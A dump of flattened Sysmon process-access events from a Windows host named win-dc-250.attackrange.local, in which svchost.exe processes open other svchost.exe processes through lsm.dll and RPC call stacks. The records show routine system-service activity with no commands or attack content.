13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.451{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.435{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.435{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.420{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.420{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.420{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.420{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.420{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.420{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.420{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.404{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.404{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.404{08A6967A-4754-6000-1A05-000000009A01}28844184C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 